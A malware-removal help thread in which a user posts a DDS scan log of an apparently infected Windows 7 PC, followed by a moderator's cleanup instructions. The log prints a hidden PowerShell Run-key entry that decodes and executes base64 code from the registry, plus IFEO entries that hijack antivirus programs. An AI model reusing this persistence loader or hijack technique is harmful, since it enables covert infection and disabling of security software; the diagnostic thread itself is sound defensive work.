Go Back   Tech Support Forum > Security Center > Virus/Trojan/Spyware Help

User Tag List

Not working correctly Windows Firewall

This is a discussion on Not working correctly Windows Firewall within the Virus/Trojan/Spyware Help forums, part of the Tech Support Forum category. My issue is as follows a few weeks ago,maybe even months,i noticed that my firewall would turn on without me


Closed Thread
 
Thread Tools Search this Thread
Old 10-13-2016, 08:18 AM   #1
Registered Member
 
Join Date: Oct 2016
Posts: 31
OS: windows 7 service pack 1



My issue is as follows a few weeks ago,maybe even months,i noticed that my firewall would turn on without me knowing and ask to let the program through.the reason i didnt have firewall turned on at the time was because the firewall would turn the a few minute process into a few hours.Some time later firewall would start asking to let through programs like steam,origin,games from steam and origin.This programs i have used before so i knew right away there was something wrong.A few weeks later firewall stopped blocking programs even when he did ask for permission.I noticed that it stopped because before when i got the prompt the program would not have full internet access and would be slower.Now i am asking for a fix since it is NOT working correcly only a few days ago it started blocking again,2 days later it stopped,and now it is not.
i have made a thread where the person helping me simply told me to go here.This issue has been quite annoying.
P.S. i do not have access to the windows or boot cd.
link to the thread:
hxxp://www.techsupportforum.com/forums/f112/windows-firewall-not-working-correctly-1161473.html#post7240897

the log will be attached below because i wasnt sure if i should place the dds one here or attach.the attach.txt will also be attached below in case you need it.

DDS (Ver_2012-11-20.01) - NTFS_x86
Internet Explorer: 11.0.9600.18500 BrowserJavaVersion: 11.91.2
Run by violeta at 16:52:43 on 2016-10-13
Microsoft Windows 7 Professional 6.1.7601.1.1252.1.1033.18.2013.1231 [GMT 2:00]
.
AV: Trend Micro Titanium Internet Security *Disabled/Outdated* {68F968AC-2AA0-091D-848C-803E83E35902}
SP: Trend Micro Titanium Internet Security *Disabled/Outdated* {D3988948-0C9A-0693-BE3C-BB4CF86413BF}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ================
.
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\System32\spoolsv.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
C:\Program Files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
C:\Program Files\Hi-Rez Studios\HiPatchService.exe
C:\Program Files\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe
C:\Program Files\LogMeIn Hamachi\LMIGuardianSvc.exe
C:\Windows\system32\PnkBstrA.exe
C:\Program Files\Razer\Razer Services\GSS\GameScannerService.exe
C:\Program Files\Razer\Razer Cortex\RzKLService.exe
C:\Program Files\ShadowExplorer\sesvc.exe
C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
C:\Program Files\Alcohol Soft\Alcohol 120\StarWind\StarWindServiceAE.exe
C:\Program Files\TeamViewer\TeamViewer_Service.exe
C:\ProgramData\Telenor Internet\OnlineUpdate\ouc.exe
C:\Program Files\TunnelBear\TBear.Maintenance.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Program Files\LogMeIn Hamachi\hamachi-2.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Windows\system32\taskhost.exe
C:\Windows\system32\SearchIndexer.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Windows\Microsoft.Net\Framework\v3.0\WPF\PresentationFontCache.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Program Files\Microsoft\BingBar\7.1.362.0\SeaPort.exe
C:\Windows\system32\wuauclt.exe
C:\Windows\System32\WUDFHost.exe
C:\Windows\system32\taskhost.exe
C:\Windows\system32\msiexec.exe
C:\Windows\system32\sppsvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\System32\svchost.exe -k secsvcs
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\system32\svchost.exe -k SDRSVC
C:\Windows\System32\svchost.exe -k swprv
.
============== Pseudo HJT Report ===============
.
uDefault_Page_URL = about:blank
mStart Page = about:blank
mDefault_Page_URL = about:blank
uWindows: Load = c:\windows\system32\Microsoft.com
uRun: [AlcoholAutomount] "c:\program files\alcohol soft\alcohol 120\axcmd.exe" /automount
uRun: [{57E0064B-6CDF-4014-A8FF-F401291F5488}] c:\windows\system32\windowspowershell\v1.0\powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([text.encoding]::ascii.getstring([convert]::frombase64string((gp 'hkcu:\software\classes\NYQUMMEV').KgJaKWdyhxnot)));
mRun: [IgfxTray] c:\windows\system32\igfxtray.exe
mRun: [HotKeysCmds] c:\windows\system32\hkcmd.exe
mRun: [Persistence] c:\windows\system32\igfxpers.exe
mRun: [SunJavaUpdateSched] "c:\program files\common files\java\java update\jusched.exe"
mRun: [LogMeIn Hamachi Ui] "c:\program files\logmein hamachi\hamachi-2-ui.exe" --auto-start
mRun: [Lightshot] c:\program files\skillbrains\lightshot\Lightshot.exe
dRunOnce: [SPReview] "c:\windows\system32\spreview\SPReview.exe" /sp:1 /errorfwlink:"https://go.microsoft.com/fwlink/?LinkID=122915" /build:7601
dRunOnce: [SpUninstallDeleteDir] rmdir /s /q "\SearchProtect"
StartupFolder: c:\users\violeta\appdata\roaming\microsoft\windows\start menu\programs\startup\Registration RAYMAN
mPolicies-Explorer: NoDriveTypeAutoRun = dword:221
mPolicies-Explorer: HideSCAHealth = dword:1
mPolicies-System: ConsentPromptBehaviorAdmin = dword:5
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableUIADesktopToggle = dword:0
mPolicies-Explorer: HideSCAHealth = dword:1
IE: E&xport to Microsoft Excel - c:\progra~1\micros~1\office12\EXCEL.EXE/3000
Trusted Zone: clonewarsadventures.com
Trusted Zone: freerealms.com
Trusted Zone: soe.com
Trusted Zone: sony.com
TCP: Interfaces\{5A19095F-7933-4DA1-AD09-19E979DC22C7} : NameServer = 217.65.192.101 217.65.192.102
TCP: Interfaces\{79289764-7478-4021-A6D0-8EAF6EFDDD53} : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{79976A8E-F478-4642-88DD-27DD71B01DC2} : DHCPNameServer = 172.18.12.1
TCP: Interfaces\{9F6CCFF6-FC61-4F75-BD9A-39A7BE019C6E} : NameServer = 217.65.192.101 217.65.192.102
TCP: Interfaces\{C2E0376F-F85D-46E3-80E2-201AFBF0F518} : NameServer = 217.65.192.101 217.65.192.102
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - c:\program files\microsoft office\office12\GrooveSystemServices.dll
Handler: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - c:\program files\skype\toolbars\internet explorer\SkypeIEPlugin.dll
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - c:\program files\common files\skype\Skype4COM.dll
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - c:\program files\skype\toolbars\internet explorer\SkypeIEPlugin.dll
Handler: tmbp - {1A77E7DC-C9A0-4110-8A37-2F36BAE71ECF} - c:\program files\trend micro\amsp\module\20002\6.6.1010\6.6.1010\TmBpIe32.dll
Handler: tmpx - {0E526CB5-7446-41D1-A403-19BFE95E8C23} - c:\program files\trend micro\amsp\module\20004\1.5.1504\6.6.1088\TmIEPlg.dll
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - c:\program files\windows live\photo gallery\AlbumDownloadProtocolHandler.dll
Notify: igfxcui - igfxdev.dll
SSODL: WebCheck - <orphaned>
SEH: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - c:\program files\microsoft office\office12\GrooveShellExtensions.dll
IFEO: AvastSvc.exe - c:\windows\system32\Microsoft.com
IFEO: AvastUI.exe - c:\windows\system32\Microsoft.com
IFEO: avcenter.exe - c:\windows\system32\Microsoft.com
IFEO: avconfig.exe - c:\windows\system32\Microsoft.com
IFEO: avgcsrvx.exe - c:\windows\system32\Microsoft.com
.
Note: multiple IFEO entries found. Please refer to Attach.txt
.
================= FIREFOX ===================
.
FF - ProfilePath - c:\users\violeta\appdata\roaming\mozilla\firefox\profiles\pgyttybc._\
FF - plugin: c:\program files\foxit software\foxit reader\plugins\npFoxitReaderPlugin.dll
FF - plugin: c:\program files\google\google earth\plugin\npgeplugin.dll
FF - plugin: c:\program files\google\update\1.3.31.5\npGoogleUpdate3.dll
FF - plugin: c:\program files\heroes & generals\live\npretox-1.0.6.1\npretoxlive-1.0.6.1.dll
FF - plugin: c:\program files\java\jre1.8.0_91\bin\dtplugin\npdeployJava1.dll
FF - plugin: c:\program files\java\jre1.8.0_91\bin\plugin2\npjp2.dll
FF - plugin: c:\program files\microsoft silverlight\5.1.50901.0\npctrlui.dll
FF - plugin: c:\program files\ubisoft\ubisoft game launcher\npuplaypc.dll
FF - plugin: c:\program files\ubisoft\ubisoft game launcher\npuplaypchub.dll
FF - plugin: c:\program files\windows live\photo gallery\NPWLPG.dll
FF - plugin: c:\programdata\happycloud\application\npHappyCloudPlugin.dll
FF - plugin: c:\programdata\nexonus\ngm\npNxGameUS.dll
FF - plugin: c:\users\violeta\appdata\locallow\unity\webplayer\loader\npUnity3D32.dll
FF - plugin: c:\windows\system32\adobe\director\np32dsw_1213153.dll
FF - plugin: c:\windows\system32\macromed\flash\NPSWF32_23_0_0_162.dll
.
============= SERVICES / DRIVERS ===============
.
P2 HiPatchService;Hi-Rez Studios Authenticate and Update Service;c:\program files\hi-rez studios\HiPatchService.exe [2016-9-18 9728]
R2 c2cautoupdatesvc;Skype Click to Call Updater;c:\program files\skype\toolbars\autoupdate\SkypeC2CAutoUpdateSvc.exe [2016-5-25 1364096]
R2 c2cpnrsvc;Skype Click to Call PNR Service;c:\program files\skype\toolbars\pnrsvc\SkypeC2CPNRSvc.exe [2016-5-25 1687680]
R2 Hamachi2Svc;LogMeIn Hamachi Tunneling Engine;c:\program files\logmein hamachi\hamachi-2.exe [2016-9-13 1958408]
R2 IntelHaxm;Intel HAXM Service;c:\windows\system32\drivers\IntelHaxm.sys [2016-3-12 78848]
R2 IpOverUsbSvc;Windows Phone IP over USB Transport (IpOverUsbSvc);c:\program files\common files\microsoft shared\phone tools\corecon\11.0\bin\IpOverUsbSvc.exe [2014-4-17 22768]
R2 LMIGuardianSvc;LMIGuardianSvc;c:\program files\logmein hamachi\LMIGuardianSvc.exe [2016-8-31 405424]
R2 Razer Game Scanner Service;Razer Game Scanner;c:\program files\razer\razer services\gss\GameScannerService.exe [2015-8-15 188072]
R2 RzKLService;RzKLService;c:\program files\razer\razer cortex\RzKLService.exe [2015-5-2 129168]
R2 rzpmgrk;rzpmgrk;c:\windows\system32\drivers\rzpmgrk.sys [2015-5-2 20288]
R2 sesvc;ShadowExplorer Service;c:\program files\shadowexplorer\sesvc.exe [2015-9-1 9216]
R2 StarWindServiceAE;StarWind AE Service;c:\program files\alcohol soft\alcohol 120\starwind\StarWindServiceAE.exe [2007-5-28 275968]
R2 TeamViewer;TeamViewer 11;c:\program files\teamviewer\TeamViewer_Service.exe [2015-8-3 6889232]
R2 tmevtmgr;tmevtmgr;c:\windows\system32\drivers\tmevtmgr.sys [2012-1-6 64080]
R2 TunnelBearMaintenance;TunnelBear Maintenance;c:\program files\tunnelbear\TBear.Maintenance.exe [2016-5-11 41472]
R3 BBUpdate;BBUpdate;c:\program files\microsoft\bingbar\7.1.362.0\SeaPort.EXE [2012-2-13 240408]
R3 EvolveVirtualAdapter;Evolve Virtual Miniport Driver;c:\windows\system32\drivers\evolve.sys [2013-6-12 18584]
R3 huawei_enumerator;huawei_enumerator;c:\windows\system32\drivers\ew_jubusenum.sys [2011-12-19 73216]
R3 L1C;NDIS Miniport Driver for Atheros AR8131/AR8132 PCI-E Ethernet Controller (NDIS 6.20);c:\windows\system32\drivers\L1C62x86.sys [2009-6-10 50688]
R3 tap-tb-0901;TunnelBear Adapter V9;c:\windows\system32\drivers\tap-tb-0901.sys [2015-8-10 33280]
R3 XSplit_Dummy;XSplit Stream Audio Renderer;c:\windows\system32\drivers\xspltspk.sys [2014-7-2 22104]
R3 zttap200;ZeroTier One Virtual Network Port;c:\windows\system32\drivers\zttap200.sys [2014-11-20 28824]
S2 Amsp;Trend Micro Solution Platform;c:\program files\trend micro\amsp\coreServiceShell.exe [2012-1-6 188272]
S2 BBSvc;BingBar Service;c:\program files\microsoft\bingbar\7.1.362.0\BBSvc.EXE [2012-2-13 193816]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;c:\windows\microsoft.net\framework\v4.0.30319\mscorsvw.exe [2015-11-5 105144]
S2 HWDeviceService.exe;HWDeviceService.exe;"c:\programdata\datacardservice\hwdeviceservice.exe" -/service --> c:\programdata\datacardservice\HWDeviceService.exe [?]
S2 Origin Web Helper Service;Origin Web Helper Service;c:\program files\origin\OriginWebHelperService.exe [2016-9-15 2209296]
S2 Skype C2C Service;Skype C2C Service;c:\programdata\skype\toolbars\skype c2c service\c2c_service.exe [2012-5-30 3048136]
S2 SkypeUpdate;Skype Updater;c:\program files\skype\updater\Updater.exe [2016-5-23 324224]
S2 Telenor Internet. RunOuc;Telenor Internet. OUC;c:\program files\telenor internet\updatedog\ouc.exe [2011-12-19 246112]
S3 b57nd60x;Broadcom NetXtreme Gigabit Ethernet - NDIS 6.0;c:\windows\system32\drivers\b57nd60x.sys [2009-7-14 229888]
S3 BroadcomWModem;Broadcom Corporation BroadcomWModem;c:\windows\system32\drivers\bcmww.sys [2005-6-2 118400]
S3 c2wts;Claims to Windows Token Service;c:\program files\windows identity foundation\v3.5\c2wtshost.exe [2014-10-8 15768]
S3 DrvAgent32;DrvAgent32;c:\windows\system32\drivers\DrvAgent32.sys [2014-12-11 23456]
S3 EvoSvc;Evolve Service;c:\program files\echobit\evolve\EvoSvc.exe [2015-8-18 1583488]
S3 ew_hwusbdev;Huawei MobileBroadband USB PNP Device;c:\windows\system32\drivers\ew_hwusbdev.sys [2011-12-19 102784]
S3 ew_usbenumfilter;huawei_CompositeFilter;c:\windows\system32\drivers\ew_usbenumfilter.sys [2011-12-19 11136]
S3 ewusbmbb;HUAWEI USB-WWAN miniport;c:\windows\system32\drivers\ewusbwwan.sys [2011-12-19 353280]
S3 fssfltr;fssfltr;c:\windows\system32\drivers\fssfltr.sys [2012-9-4 49088]
S3 fsssvc;Windows Live Family Safety Service;c:\program files\windows live\family safety\fsssvc.exe [2012-7-28 1511872]
S3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\ieetwcollector.exe [2016-10-12 102912]
S3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys [2014-2-8 22856]
S3 mvusbews;USB EWS Device;c:\windows\system32\drivers\mvusbews.sys [2012-12-24 17408]
S3 npggsvc;nProtect GameGuard Service;c:\windows\system32\gamemon.des -service --> c:\windows\system32\GameMon.des -service [?]
S3 Origin Client Service;Origin Client Service;c:\program files\origin\OriginClientService.exe [2016-9-15 2142728]
S3 OverwolfUpdater;Overwolf Updater Windows SCM;c:\program files\overwolf\OverwolfUpdater.exe [2016-8-29 1310448]
S3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys [2015-8-24 14848]
S3 StorSvc;Storage Service;c:\windows\system32\svchost.exe -k LocalSystemNetworkRestricted [2009-7-14 20992]
S3 Te.Service;Te.Service;c:\program files\windows kits\8.1\testing\runtimes\taef\Wex.Services.exe [2013-8-21 91136]
S3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\TsUsbFlt.sys [2015-8-24 49152]
S3 VsEtwService120;Visual Studio ETW Event Collection Service;c:\program files\microsoft visual studio 12.0\common7\packages\debugger\services\VsEtwService.exe [2014-7-23 73360]
S3 VSStandardCollectorService140;Visual Studio Standard Collector Service;c:\program files\microsoft visual studio 14.0\team tools\diagnosticshub\collector\StandardCollector.Service.exe [2016-3-22 48872]
.
=============== File Associations ===============
.
FileExt: .js: Applications\notepad++.exe="c:\program files\notepad++\notepad++.exe" "%1" [UserChoice]
.
=============== Created Last 30 ================
.
2016-10-13 12:14:31 62576 ----a-w- c:\programdata\microsoft\windows defender\definition updates\{1b03c628-ca8d-470f-8393-bca3279c2538}\offreg.3268.dll
2016-10-12 13:13:07 -------- d-----w- c:\program files\Skillbrains
2016-10-12 11:55:59 815304 ----a-w- c:\program files\internet explorer\iexplore.exe
2016-10-11 14:14:37 62576 ----a-w- c:\programdata\microsoft\windows defender\definition updates\{1b03c628-ca8d-470f-8393-bca3279c2538}\offreg.3732.dll
2016-10-11 07:25:22 9837072 ----a-w- c:\programdata\microsoft\windows defender\definition updates\{1b03c628-ca8d-470f-8393-bca3279c2538}\mpengine.dll
2016-10-06 15:17:22 -------- d-----w- c:\users\violeta\appdata\roaming\Duelyst
2016-09-21 06:47:47 2048 ----a-w- c:\windows\system32\tzres.dll
2016-09-19 18:35:27 -------- d-----w- c:\users\violeta\appdata\local\{26E83D09-9D35-755D-7492-57CF5473C38A}
2016-09-18 19:36:50 -------- d-----w- c:\users\violeta\appdata\local\HirezLauncherUI
2016-09-18 19:31:39 -------- d-----w- c:\program files\Hi-Rez Studios
2016-09-18 14:19:06 -------- d-----w- c:\users\violeta\appdata\roaming\.minecraft
2016-09-15 13:51:48 -------- d-----w- c:\users\violeta\.QtWebEngineProcess
2016-09-15 13:51:46 -------- d-----w- c:\users\violeta\.Origin
2016-09-14 04:52:22 -------- d-----w- c:\program files\LogMeIn Hamachi
.
==================== Find3M ====================
.
2016-09-30 15:20:30 4000488 ----a-w- c:\windows\system32\ntkrnlpa.exe
2016-09-30 15:20:30 3944680 ----a-w- c:\windows\system32\ntoskrnl.exe
2016-09-30 05:54:40 2724864 ----a-w- c:\windows\system32\mshtml.tlb
2016-09-30 05:54:29 4096 ----a-w- c:\windows\system32\ieetwcollectorres.dll
2016-09-30 05:42:47 498688 ----a-w- c:\windows\system32\vbscript.dll
2016-09-30 05:42:45 62464 ----a-w- c:\windows\system32\iesetup.dll
2016-09-30 05:42:09 47616 ----a-w- c:\windows\system32\ieetwproxystub.dll
2016-09-30 05:42:01 341504 ----a-w- c:\windows\system32\html.iec
2016-09-30 05:41:14 64000 ----a-w- c:\windows\system32\MshtmlDac.dll
2016-09-30 05:32:43 102912 ----a-w- c:\windows\system32\ieetwcollector.exe
2016-09-30 05:32:38 115712 ----a-w- c:\windows\system32\ieUnatt.exe
2016-09-30 05:32:21 620032 ----a-w- c:\windows\system32\jscript9diag.dll
2016-09-30 05:27:34 667648 ----a-w- c:\windows\system32\MsSpellCheckingFacility.exe
2016-09-30 05:19:54 60416 ----a-w- c:\windows\system32\JavaScriptCollectionAgent.dll
2016-09-30 05:12:59 4608512 ----a-w- c:\windows\system32\jscript9.dll
2016-09-30 05:05:17 2055680 ----a-w- c:\windows\system32\inetcpl.cpl
2016-09-30 05:05:00 1155072 ----a-w- c:\windows\system32\mshtmlmedia.dll
2016-09-30 04:46:52 2444288 ----a-w- c:\windows\system32\wininet.dll
2016-09-24 08:29:15 47920 ----a-w- c:\windows\system32\partizan.exe
2016-09-15 15:15:01 84480 ----a-w- c:\windows\system32\INETRES.dll
2016-09-15 15:15:01 741888 ----a-w- c:\windows\system32\inetcomm.dll
2016-09-14 07:30:06 796352 ----a-w- c:\windows\system32\FlashPlayerApp.exe
2016-09-14 07:30:06 142528 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2016-09-13 16:53:44 27040 ---ha-w- c:\windows\system32\hamachi.sys
2016-09-12 20:54:23 67816 ----a-w- c:\windows\system32\CompatTelRunner.exe
2016-09-12 20:53:41 67304 ----a-w- c:\windows\system32\drivers\ksecdd.sys
2016-09-12 20:53:41 137960 ----a-w- c:\windows\system32\drivers\ksecpkg.sys
2016-09-12 20:29:45 50176 ----a-w- c:\windows\system32\auditpol.exe
2016-09-12 20:28:41 2399232 ----a-w- c:\windows\system32\win32k.sys
2016-09-12 20:26:06 226304 ----a-w- c:\windows\system32\drivers\mrxsmb10.sys
2016-09-12 20:26:04 98304 ----a-w- c:\windows\system32\drivers\mrxsmb20.sys
2016-09-12 20:26:00 124416 ----a-w- c:\windows\system32\drivers\mrxsmb.sys
2016-09-12 20:25:30 36352 ----a-w- c:\windows\system32\cryptbase.dll
2016-09-12 20:25:29 22016 ----a-w- c:\windows\system32\lsass.exe
2016-09-12 20:25:29 15872 ----a-w- c:\windows\system32\sspisrv.dll
2016-09-12 19:08:46 909824 ----a-w- c:\windows\system32\FntCache.dll
2016-09-12 19:08:46 1251328 ----a-w- c:\windows\system32\DWrite.dll
2016-09-10 15:53:43 2291712 ----a-w- c:\windows\system32\MSVidCtl.dll
2016-09-09 18:01:23 1310528 ----a-w- c:\windows\system32\ntdll.dll
2016-09-09 18:00:00 43008 ----a-w- c:\windows\system32\srclient.dll
2016-09-09 18:00:00 400896 ----a-w- c:\windows\system32\srcore.dll
2016-09-09 17:59:58 50176 ----a-w- c:\windows\system32\setbcdlocale.dll
2016-09-09 17:59:47 38912 ----a-w- c:\windows\system32\csrsrv.dll
2016-09-09 17:59:46 6656 ----a-w- c:\windows\system32\apisetschema.dll
2016-09-09 17:59:46 644096 ----a-w- c:\windows\system32\advapi32.dll
2016-09-09 17:59:46 50688 ----a-w- c:\windows\system32\appidapi.dll
2016-09-09 17:42:07 97792 ----a-w- c:\windows\system32\appidpolicyconverter.exe
2016-09-09 17:42:05 50688 ----a-w- c:\windows\system32\drivers\appid.sys
2016-09-09 17:42:05 16896 ----a-w- c:\windows\system32\appidcertstorecheck.exe
2016-09-09 17:42:04 29696 ----a-w- c:\windows\system32\appidsvc.dll
2016-09-09 17:39:47 262656 ----a-w- c:\windows\system32\rstrui.exe
2016-09-09 17:37:25 69632 ----a-w- c:\windows\system32\smss.exe
2016-09-09 15:53:28 488448 ----a-w- c:\windows\system32\devinv.dll
2016-09-09 15:53:28 478208 ----a-w- c:\windows\system32\generaltel.dll
2016-09-09 15:53:28 268800 ----a-w- c:\windows\system32\invagent.dll
2016-09-09 15:53:28 213504 ----a-w- c:\windows\system32\centel.dll
2016-09-09 15:53:27 184320 ----a-w- c:\windows\system32\aepic.dll
2016-09-09 15:53:27 1406976 ----a-w- c:\windows\system32\appraiser.dll
2016-09-09 15:53:27 107008 ----a-w- c:\windows\system32\acmigration.dll
2016-09-08 20:34:14 208896 ----a-w- c:\windows\system32\WebClnt.dll
2016-09-08 20:34:01 87040 ----a-w- c:\windows\system32\davclnt.dll
2016-09-08 14:49:59 117248 ----a-w- c:\windows\system32\drivers\mrxdav.sys
2016-09-08 14:49:56 81408 ----a-w- c:\windows\system32\drivers\dfsc.sys
2016-08-29 15:12:38 1499648 ----a-w- c:\windows\system32\ExplorerFrame.dll
2016-08-29 15:12:35 1806848 ----a-w- c:\windows\system32\authui.dll
2016-08-29 14:55:07 2972672 ----a-w- c:\windows\explorer.exe
2016-08-16 20:42:13 3072 ----a-w- c:\windows\system32\drivers\en-us\usbehci.sys.mui
2016-08-16 20:42:12 11776 ----a-w- c:\windows\system32\drivers\en-us\usbhub.sys.mui
2016-08-16 20:41:57 24576 ----a-w- c:\windows\system32\drivers\en-us\usbport.sys.mui
2016-08-16 20:27:20 259072 ----a-w- c:\windows\system32\drivers\usbhub.sys
2016-08-16 20:27:02 76288 ----a-w- c:\windows\system32\drivers\usbccgp.sys
2016-08-16 20:26:59 46592 ----a-w- c:\windows\system32\drivers\usbehci.sys
2016-08-16 20:26:59 285696 ----a-w- c:\windows\system32\drivers\usbport.sys
2016-08-16 20:26:58 20480 ----a-w- c:\windows\system32\drivers\usbohci.sys
2016-08-16 20:26:56 24576 ----a-w- c:\windows\system32\drivers\usbuhci.sys
2016-08-16 20:26:55 6016 ----a-w- c:\windows\system32\drivers\usbd.sys
2016-08-16 02:48:13 811520 ----a-w- c:\windows\system32\user32.dll
2016-08-12 16:47:20 12574208 ----a-w- c:\windows\system32\wmploc.DLL
2016-08-12 16:46:55 2560 ----a-w- c:\windows\apppatch\AcRes.dll
2016-08-12 16:31:37 4096 ----a-w- c:\windows\system32\msdxm.ocx
2016-08-12 16:31:37 4096 ----a-w- c:\windows\system32\dxmasf.dll
2016-08-12 16:31:35 8192 ----a-w- c:\windows\system32\spwmp.dll
2016-08-12 16:21:28 437248 ----a-w- c:\windows\system32\scavengeui.dll
2016-08-12 16:21:11 310784 ----a-w- c:\windows\system32\drivers\srv.sys
2016-08-12 16:21:05 313856 ----a-w- c:\windows\system32\drivers\srv2.sys
2016-08-12 16:21:01 116224 ----a-w- c:\windows\system32\drivers\srvnet.sys
2016-08-06 15:15:08 54272 ----a-w- c:\windows\system32\WsmRes.dll
2016-08-06 15:15:08 249344 ----a-w- c:\windows\system32\WSManMigrationPlugin.dll
2016-08-06 15:15:08 214016 ----a-w- c:\windows\system32\WsmWmiPl.dll
2016-08-06 15:15:08 146944 ----a-w- c:\windows\system32\WsmAuto.dll
2016-08-06 15:15:08 1178112 ----a-w- c:\windows\system32\WsmSvc.dll
2016-08-06 15:15:01 581632 ----a-w- c:\windows\system32\oleaut32.dll
2016-08-06 14:53:18 12288 ----a-w- c:\windows\system32\wsmprovhost.exe
2016-08-06 14:53:17 199168 ----a-w- c:\windows\system32\WSManHTTPConfig.exe
2016-08-06 14:53:16 10240 ----a-w- c:\windows\system32\wsmplpxy.dll
2016-08-04 06:50:40 282624 --sha-w- c:\users\violeta\spopoi.exe
2016-07-26 12:24:26 406184 ------w- c:\windows\system32\MpSigStub.exe
2016-07-22 14:51:37 123904 ----a-w- c:\windows\system32\poqexec.exe
2016-03-13 13:32:02 3120771 ----a-w- c:\program files\common files\4gzl5t3d.exe
2016-03-12 10:24:11 3170418 ----a-w- c:\program files\common files\kqhpkjmf.exe
2010-11-05 01:58:03 32768 --sha-r- c:\windows\system32\Microsoft.com
.
============= FINISH: 17:02:57.87 ===============
Attached Files
File Type: txt attach.txt (30.7 KB, 359 views)
File Type: txt dds.txt (22.7 KB, 28 views)
nikolap is offline  
Sponsored Links
Advertisement
 
Old 10-14-2016, 10:59 AM   #2
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 
chemist's Avatar

Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Hello and Welcome to TSF.

If you haven't already, please Subscribe to this Thread to get immediate notification of replies as soon as they are posted. To do this click Thread Tools, then click Subscribe to this Thread. Make sure it is set to Instant notification by email, then click Add Subscription.

Please note that the forum is very busy and if I don't hear from you within three days this thread will be closed.

------------------------------------------------------

**Note - Please do NOT upgrade your OS to Windows 10 until your machine is clean, and we have uninstalled all our removal tools. Thanks.

------------------------------------------------------

Please download AdwCleaner from here and save it to your desktop.
  • Run AdwCleaner and select Scan
  • Once the Scan is done, select Clean
  • Once done it will ask to reboot, please allow the reboot.
  • On reboot, a log will be produced. It can also be found at C:\AdwCleaner\AdwCleaner[C#].txt
  • Please copy/paste the contents of the log in your next reply.
------------------------------------------------------

Please download Farbar Recovery Scan Tool and save it to your desktop.
  • Double-click to run it. When the tool opens click Yes to the disclaimer.
  • Make sure the Addition.txt button is ticked.
  • Press Scan button.
  • It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.
  • The first time the tool is run, it also makes another log (Addition.txt). Please attach it to your reply.
------------------------------------------------------

Check for additional security risks:
  • Please download CKScanner© by askey127 and save it to your desktop.
  • Double-click on CKScanner.exe and click Search For Files.
  • After a very short time, when the cursor hourglass disappears, click Save List To File. You will be prompted, just click OK.
  • Post the contents of ckfiles.txt in your next reply. It is located on your desktop.
------------------------------------------------------
__________________
Our services are free, but you may contribute to the author of ComboFix via PayPal

Proud member of UNITE

Microsoft MVP - Consumer Security 2014, 2015
chemist is offline  
Old 10-14-2016, 10:20 PM   #3
Registered Member
 
Join Date: Oct 2016
Posts: 31
OS: windows 7 service pack 1



the adwcleaner log:
# AdwCleaner v6.021 - Logfile created 14/10/2016 at 22:04:06
# Updated on 06/10/2016 by ToolsLib
# Database : 2016-10-14.1 [Server]
# Operating System : Windows 7 Professional Service Pack 1 (X86)
# Username : violeta - NIKOLA-PC
# Running from : C:\Users\violeta\Downloads\AdwCleaner.exe
# Mode: Clean
# Support : https://toolslib.net/forum



***** [ Services ] *****

[-] Service deleted: DrvAgent32


***** [ Folders ] *****

[-] Folder deleted: C:\Users\violeta\AppData\Local\VirtualStore\Program Files\1ClickDownload
[-] Folder deleted: C:\Users\violeta\AppData\Local\VirtualStore\Program Files\tencent
[#] Folder deleted on reboot: C:\Users\violeta\AppData\Local\VirtualStore\Program Files\Tencent
[-] Folder deleted: C:\Users\violeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Plants Vs Zombies
[-] Folder deleted: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Plants Vs Zombies
[-] Folder deleted: C:\Program Files\Plants Vs Zombies
